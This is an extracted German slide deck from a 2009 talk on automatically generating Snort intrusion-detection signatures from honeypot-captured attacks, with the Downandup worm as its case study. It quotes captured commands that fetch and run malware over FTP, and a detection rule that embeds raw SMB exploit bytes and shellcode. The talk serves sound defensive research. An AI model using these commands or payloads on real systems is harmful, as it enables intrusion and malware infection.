Automatisches Generieren komplexer Intrusion- Detection -Signaturen

Automatisches Generieren komplexerIntrusion-Detection-Signaturen Tillmann Werner CyberDefence – Schutzlos in einer vernetzten Welt? AFCEA-Informationsveranstaltung 16. Februar 2009

Automatisches Generieren komplexer Intrusion-Detection-Signaturen Angriffeim Internet • TypischerAblauf von Angriffen • Scannen von NetzbereichennachangreifbarenRechnern • Automatische, parallelisiereSystemkompromittierung • Download des eigentlichenSchadprogramms • ZusammenschlussübernommenerSystemezuBotnetzen • WeitereAttacken C&C 4 1 3 0wned 2 5 Tillmann Wern er AFCEA: Cyber Defence

Automatisches Generieren komplexer Intrusion-Detection-Signaturen Fallbeispiel: Downandup-Wurm • Fakten • VerbreitetsichautomatischüberNetzwerke • NutztSchwachstelleim Server Service auf Windows-Systemen • LädtSchadprogramm auf kompromittierteMaschinen • Schließtinfizierte Computer zueinemBotnetzzusammen ? • 23.10.2008: Microsoft veröffentlichtaußerplanmäßiges Advisory MS08-067 • 26.10.2008: PoC-Exploits im Internet verfügbar • 04.11.2008: Erste Exploits in SensorenderUniversität Bonn • 21.11.2008: Downandup • 16.01.2009: F-Secure: 9 MillioneninfizierteSystemeweltweit • 20.01.2009: 70 Systemeder Royal Navy befallen (BBC News) • 21.01.2009: Intramarinfizier – Jets derfrz. Marine könnennichtstarten (Telegraph) • 25.01.2009: Pandalabs: 5,77% aller PC infiziert • 07.02.2009: Amtsgericht Houston für 4 Tagelahmgelegt • 12.02.2009: Microsoft setzt 250.000$ Kopfgeldaus • 13.02.2009: Hunderte SystemederBundeswehr befallen (Spiegel Online) Tillmann Wern er AFCEA: Cyber Defence

Automatisches Generieren komplexer Intrusion-Detection-Signaturen Inhalt • Motivation • Sensorik • Signaturgenerierung • Anwendung und Ausblick Tillmann Wern er AFCEA: Cyber Defence

Automatisches Generieren komplexer Intrusion-Detection-Signaturen Motivation • Network Intrusion Detection • SignaturenzurErkennung und Blockade von Angriffen in Netzen • KonzeptuelleEigenschaft: Reaktiv per Definition • Signatur: FormaleBeschreibungspeziellerEigenschaften • DazugenaueKenntnis von Angriffennötig • StändigwechselndeAngriffstrends • ManuellesSignatur-Engineering kannnichtSchritthalten • AutomatisierteAngriffeerfordernautomatisierteGegenmaßnahmen • Signaturgenerierung • Minimierung des ZeitfenstersohneSchutz • Idee: SignaturenausAngriffenberechnen • WeitereAngriffedanndetektierbar Tillmann Wern er AFCEA: Cyber Defence

Automatisches Generieren komplexer Intrusion-Detection-Signaturen Sensorik • Woansetzen? • Schwachstellensind die Angriffsvektoren • Ziel: AbwehrderinitialenAttacke • Anforderungen • ErfassenneuerAngriffstypen und –varianten • VerteilteSensorik, zentraleAuswertung • EntkopplungAngriffserfassung und Signaturgenerierung • Datenerfassungistzeitkritisch • Signaturgenerierungistrechenintensiv • Honeypots • SpezielleOpfer-SystememitdemZiel, angegriffenzuwerden • ErfassenmöglichstvieleInformationenzujedemAngriff • KönnenauchvölligunbekannteAttackenerfassen Tillmann Wern er AFCEA: Cyber Defence

Automatisches Generieren komplexer Intrusion-Detection-Signaturen Signaturgenerierung: Überblick • Generierungsprozess • Sensorenerfassen und übermittelnAngriffsdaten • AutomatischeKlassifizierung • IdentifiziereninvarianterAnteile • Signatur-Komposition • Format-Übersetzung Tillmann Wern er AFCEA: Cyber Defence

Automatisches Generieren komplexer Intrusion-Detection-Signaturen Beispiel cmd /c echo open 192.168.1.100 17713 >> ii &echo user 1 1 >> ii &echo get smc.exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &smc.exe cmd /c echo open 0.0.0.0 29221 >> ii &echo user 1 1 >> ii &echo get crsss.exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &crsss.exe cmd /c echo open 192.168.176.184 39354 >> ii &echo user 1 1 >> ii &echo get aglopmn.exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &aglopmn.exe alert tcp any any -> \$HOME_NET 8555 (msg: "nebula rule 2000001 rev. 1";\ content: "cmd /c echo open "; offset: 0; depth: 17;\ content: "exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &";\ distance: 55; within: 139;\ sid: 2000001; rev: 1;)‏ Tillmann Wern er AFCEA: Cyber Defence

Automatisches Generieren komplexer Intrusion-Detection-Signaturen Signaturgenerierung: AutomatischeKlassifizierung • Angriffsklassen • Ziel: GeneriereeineSignatur pro Angriffsklasse • Klasse: MengeallerähnlichenAngriffe • ÄhnlichkeitdefiniertanhandsyntaktischerMerkmale • AutomatischeKlassifizierung (Clustering) • ClusterneingehenderAngriffeanhandÄhnlichkeit • Graph-basierterAlgorithmus • Zusammenhangskomponentenrepräsentieren Cluster • Online-Verfahren, d.h. neueKlassenwerdenzurLaufzeitgebildet Tillmann Wern er AFCEA: Cyber Defence

Automatisches Generieren komplexer Intrusion-Detection-Signaturen Signaturgenerierung: IdentifiziereninvarianterAnteile • Gemeinsame Substrings • Gesucht: Substrings, die in allenAngriffeneines Clusters vorkommen • DiesestellengemeinsameMerkmaledar • Signatur : Gemeinsame Substrings mitPositionsangaben 2 1 3 • Findenallergemeinsamen Substrings • Algorithmus auf Basis von Generalized Suffix Trees • Speziellfür die Signaturgenerierungentwickelt • Sehreffizient: O(n)bein =SummeallerAngriffsbytes Tillmann Wern er AFCEA: Cyber Defence

Automatisches Generieren komplexer Intrusion-Detection-Signaturen Signaturgenerierung: Komposition und Übersetzung • Signatur-Komposition • Ziel: MöglichstlangeSequenzbilden • Greedy-Algorithmus: Ergänztsukzessivenächstlängsten Substring • Ergebnisnichtnotwendigerweise optimal • EinfachesOptimierenwegenMehrstufigkeit des Verfahrens • Signatur-Übersetzung • GenerierteRoh-Signaturin der Praxis nichteinsetzbar • Snort-Format: De-facto-Standard • Syntax besitzt die benötigteMächtigkeit alert tcp any any -> \$HOME_NET 8555 (msg: "nebula rule 2000001 rev. 1";\ content: "cmd /c echo open "; offset: 0; depth: 17;\ content: "exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &";\ distance: 55; within: 139;\ sid: 2000001; rev: 1;)‏ Tillmann Wern er AFCEA: Cyber Defence

Automatisches Generieren komplexer Intrusion-Detection-Signaturen Signaturgenerierung: Komposition und Übersetzung alert tcp any any -> any any (msg: "nebula rule 2000001 rev. 4"; \ content: "|00 00 85 ff|SMBr|00 00 00 00 18|S|c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00|7|13 00 00 00 00 00|b|00 02|PC NETWORK PROGRAM 1.0|00 02|LANMAN1.0|00 02|Windows for Workgroups 3.1a|00 02|LM1.2X002|00 02| LANMAN2.1|00 02|NT LM 0.12|00 00 00 10 bf ff|SMBs|00 00 00 00 18 07 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00|7|13 00 00 00 00 0c ff 00 00 00 04 11 0a 00 00 00 00 00 00 00|~|10 00 00 00 00 d4 00 00 80|~|10|`|82 10|z|06 06|+|06 01 05 05 02 a0 82 10|n0|82 10|j|a1 82 10|f#|82 10|b|03 82 04 01 00|AAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|03 00|#|82 0c|W|03 82 04 0a 00 90|B|90|B|90|B|90|B|81 c4|T |f2 ff ff fc e8|F|00 00 00 8b|E<|8b 7c 05|x|01 ef 8b|O|18 8b|_ |01 eb e3|.I|8b|4|8b 01 ee|1|c0 99 ac 84 c0 |t|07 c1 ca 0d 01 c2 eb f4|\;T|24 04|u|e3 8b|_|24 01 eb|f|8b 0c|K|8b|_|1c 01 eb 8b 1c 8b 01 eb 89|\\|24 04 c3|1|c0|d|8b|@0|85 c0|x|0f 8b|@|0c 8b|p|1c ad 8b|h|08 e9 0b 00 00 00 8b|@4|05 7c 00 00 00 8b|h<_1|f6|`V|eb 0d|h|ef ce e0|`h|98 fe 8a 0e|W|ff e7 e8 ee ff ff ff|cmd /c echo open "; depth: 1435; offset: 0; \ content: ">> ii &echo user "; distance: 13; within: 1473; \ content: "exe >> ii &echo bye >> ii &ftp -n -v -s\:ii &del ii &"; distance: 17; within: 127; \ content: "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB#|0a 03 08 00 f8 0f 01 00 f8 0f 01|#|82 08|9|03 82 04 11 00|CCCC |f0 fd 7f|SVWf|81 ec 80 00 89 e6 e8 ed 00 00 00 ff|6h|09 12 d6|c|e8 f7 00 00 00 89|F|08 e8 a2 00 00 00 ff|v|04|hk|d0|+|ca e8 e2 00 00 00 89|F|0c e8|?|00 00 00 ff|v|04|h|fa 97 02|L|e8 cd 00 00 00|1|db|h|10 04 00 00|S|ff d0 89 c3|V|8b|v|10 89 c7 b9 10 04 00 00 f3 a4|^1|c0|PPPSPP|ff| V|0c 8b|F|08|f|81 c4 80 00|_^[|ff e0|`|e8|#|00 00 00 8b|D|24 0c 8d|X|7c 83|C<|05 81|C(|00 10 00 00 81|c(|0 0 f0 ff ff 8b 04 24 83 c4 14|P1|c0 c3|1|d2|d|ff|2d|89|\"1|db b8 90|B|90|B1|c9 b1 02 89 df f3 af|t|03|C|eb f3 89|~|10|d|8f 02|Xa|c3|`|bf| |f0 fd 7f 8b 1f 8b|F|08 89 07 8b 7f f8 81 c7|x|01 00 00 89 f9|9|19|t|04 8b 09 eb f8 89 fa|9Z|04|t|05 8b|R|04 eb f6 89 11 89|J|04 c6|C|fd 01|a|c3 a1 0c f0 fd 7f 8b|@|1c 8b|X|08 89 1e 8b 00 8b|@|08 89|F|04 c3|`|8b|l|24|(|8b|E<|8b|T|05|x|01 ea 8b|J|18 8b|Z |01 eb e3|8I|8b|4|8b 01 ee|1|ff|1| c0 fc ac|8|e0|t|07 c1 cf 0d 01 c7 eb f4|\;|7c 24 24|u|e1 8b|Z|24 01 eb|f|8b 0c|K|8b|Z|1c 01 eb 8b 04 8b 01 e8 89|D|24 1c|a|c2 08 00 eb fe|CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCC#|82 04| |03 09 00 eb 06 90 90 90 90 90 90 03 82 04 11 00|DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD DDDDDDDD|00 00 00 00 00 00|"; distance: 19; within: 2937; \ sid: 2000001; rev: 4;) Tillmann Werner Tillmann Wern er AFCEA: Cyber Defence

Automatisches Generieren komplexer Intrusion-Detection-Signaturen Anwendung und Ausblick • SelbstschützendeNetze • Sensoren, Signatur-Generator und IDS imselbenNetz • NeueRegelbeineuenAngriffswellen • AktuelleherForschungscharacterwegenMissbrauchsgefahr • WerkzeugzurAngriffsanalyse • MethodeauchhilfreichbeimanuellerAngriffsanaylse • SignaturbeschreibtstatischeAnteile • SchnelleresVerständnis von Angriffsdetails • Ausblick • WeitereForschungnötig und möglich • VerbesserunginsbesonderedurchmehrstrukturellesWissenüberAngriffe • Idee: Lernen von DialogstrukturenzwischenAngreifer und Opfer Tillmann Wern er AFCEA: Cyber Defence

Fragen? Tillmann Werner werner@cs.uni-bonn.de Institut für Informatik IV Universität Bonn Römerstraße 164 53117 Bonn

Automatisches Generieren komplexer Intrusion- Detection -Signaturen

Automatisches Generieren komplexer Intrusion- Detection -Signaturen

Presentation Transcript

Intrusion Detection

Intrusion Detection

Intrusion Detection

Intrusion Detection

Intrusion Detection

Intrusion Detection

Intrusion Detection

Intrusion Detection

Intrusion Detection

INTRUSION DETECTION

Intrusion Detection

Intrusion Detection

Intrusion Detection

Intrusion Detection

Intrusion Detection

Intrusion Detection

Intrusion Detection

Intrusion Detection

Intrusion Detection

Intrusion Detection

Intrusion Detection